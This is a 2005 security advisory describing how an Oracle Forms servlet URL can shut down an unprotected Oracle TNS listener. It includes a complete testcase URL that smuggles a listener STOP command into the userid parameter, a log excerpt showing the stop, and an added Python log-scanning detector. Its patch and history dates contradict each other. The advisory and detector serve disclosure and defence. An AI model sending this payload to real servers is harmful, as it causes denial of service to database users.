Red-Database-Security GmbH is specialized in Oracle Security

Shutdown TNS Listener via Oracle Forms Servlet

Name: Shutdown TNS Listener via Oracle Forms Servlet
Systems Affected: Oracle Forms
Severity: Medium Risk
Category: Denial of Service
Vendor URL: http://www.oracle.com/
Author: Alexander Kornbrust (ak at red-database-security.com)
Date: 7 October 2005 (V 1.00)


Details
The Forms servlet can be used to stop the TNS Listener if the listener is not protected with a password.

Affected Products
Oracle Forms

Patch Information
This bug is fixed with Critical Patch Update July 2005 (CPU July 2005).
Oracle forgot to inform Red-Database-Security that this bug is fixed with CPU July 2005.

Workaround
Protect the TNS Listener with a password.

Testcase

http://server:8888/forms90/f90servlet?form=test.fmx&userid=SCOTT/TIGER@
(DESCRIPTION=(ADDRESS_LIST=(ADDRESS=(PROTOCOL=TCP)(HOST=server)(PORT=1521)))
(CONNECT_DATA=(COMMAND=STOP)(SERVICE=LISTENER)))
&buffer_records=NO&debug_messages=NO&array=YES&query_only=NO&quiet=NO&RENDER=YES


Excerpt from the listener.log:

28-OCT-2003 14:44:46 * (CONNECT_DATA=(COMMAND=STOP)(SERVICE=LISTENER)
(CID=(PROGRAM=C:\oracle\oradev9i\bin\ifweb90.exe)(HOST=SERVER)(USER=Administrator))) * stop * 0
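
As an added example (not part of the original advisory and not Oracle code), the Python code below scans listener.log entries like the excerpt above for listener commands carried in CONNECT_DATA and marks those sent by a Forms runtime. The function names are hypothetical, the sample lines other than the advisory's STOP entry are constructed, and the "ifweb" program-name check is an assumption based on that excerpt.

```python
import re
from ntpath import basename  # PROGRAM values in the excerpt are Windows paths

LEAF = re.compile(r"\((\w+)=([^()]*)\)")  # innermost (KEY=value) pairs

def parse_entry(line):
    """Split one listener.log entry into its timestamp and CONNECT_DATA fields."""
    parts = [p.strip() for p in line.split(" * ")]
    if len(parts) < 3 or not parts[1].startswith("(CONNECT_DATA="):
        return None  # not a connect/command entry (banner, TNS error text, ...)
    fields = {k.upper(): v for k, v in LEAF.findall(parts[1])}
    return {
        "time": parts[0],
        "command": fields.get("COMMAND", "").upper(),
        "program": basename(fields.get("PROGRAM", "")),
        "host": fields.get("HOST", ""),
        "user": fields.get("USER", ""),
        "result": parts[-1],  # trailing return code (0 in the excerpt)
    }

def find_listener_commands(lines, watched=("STOP",)):
    """Return entries whose CONNECT_DATA carries one of the watched commands."""
    hits = []
    for line in lines:
        entry = parse_entry(line)
        if entry and entry["command"] in watched:
            # Assumption: a Forms runtime (ifweb*.exe in the excerpt) never has
            # a legitimate reason to send listener control commands.
            entry["from_forms_runtime"] = entry["program"].lower().startswith("ifweb")
            hits.append(entry)
    return hits

# Line 3 is the advisory's entry joined onto one line; lines 1-2 are constructed.
SAMPLE_LOG = [
    r"28-OCT-2003 14:40:02 * (CONNECT_DATA=(SERVICE_NAME=orcl)(CID=(PROGRAM=C:\oracle\oradev9i\bin\ifweb90.exe)(HOST=SERVER)(USER=Administrator))) * (ADDRESS=(PROTOCOL=tcp)(HOST=192.0.2.10)(PORT=1045)) * establish * orcl * 0",
    r"28-OCT-2003 14:41:10 * (CONNECT_DATA=(CID=(PROGRAM=)(HOST=SERVER)(USER=oracle))(COMMAND=status)(ARGUMENTS=64)(SERVICE=LISTENER)) * status * 0",
    r"28-OCT-2003 14:44:46 * (CONNECT_DATA=(COMMAND=STOP)(SERVICE=LISTENER)(CID=(PROGRAM=C:\oracle\oradev9i\bin\ifweb90.exe)(HOST=SERVER)(USER=Administrator))) * stop * 0",
]

if __name__ == "__main__":
    for hit in find_listener_commands(SAMPLE_LOG):
        print(hit)
```

Only the CONNECT_DATA field of each entry is parsed, so the HOST reported is the client-supplied CID value, not the network address.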


History
14-feb-2005 Oracle secalert was informed
15-feb-2003 Bug confirmed
18-oct-2005 Oracle published the Critical Patch Update October 2005 (CPU October 2005)
20-oct-2005 Red-Database-Security published this advisory



2005 by Red-Database-Security GmbH - last update 03-nov-2005

Oracle Forms

Oracle Forms, a component of the Oracle Developer Suite, is Oracle's long-established technology to design and build enterprise applications quickly and efficiently.

Oracle remains committed to the development of this technology, and to the ongoing release as a component of the Oracle platform. This continuing commitment to Forms technology enables you to leverage your existing investment by easily upgrading and integrating existing Oracle Forms applications to take advantage of web technologies and service oriented architectures (SOA).